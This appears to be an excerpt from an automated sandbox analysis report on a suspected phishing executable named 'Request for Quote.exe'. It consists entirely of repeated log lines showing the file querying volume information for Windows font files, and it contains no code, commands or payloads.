Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quote.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
